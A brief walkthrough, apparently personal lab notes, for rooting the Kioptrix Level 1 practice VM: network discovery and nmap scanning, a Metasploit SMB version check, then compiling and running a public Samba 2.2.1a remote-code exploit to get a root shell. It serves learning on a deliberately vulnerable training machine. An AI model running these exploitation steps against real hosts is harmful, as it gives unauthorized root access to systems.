Kioptrix Level 1

this one is actually really simple and there's multiple methods to gain root. after enumerating and discovering a vulnerable Samba version - check for a public RCE exploit and viola!

the quick method :

netdiscover -i eth0

nmap -p- -A IP

identify it's running Samba

msfconsole

use auxiliary(scanner/smb/smb_version

set RHOSTS IP

run

confirm it's running Samba 2.2.1a

search google for 'Samba 2.2.1a' exploit RCE: https://www.exploit-db.com/exploits/10 grab this exploit gcc 10.c -o 10

./10 -b 0 IP

get a better shell [interactive shell]

/bin/bash -i

PreviousFAQ NextImportant Commands

Last updated 4 years ago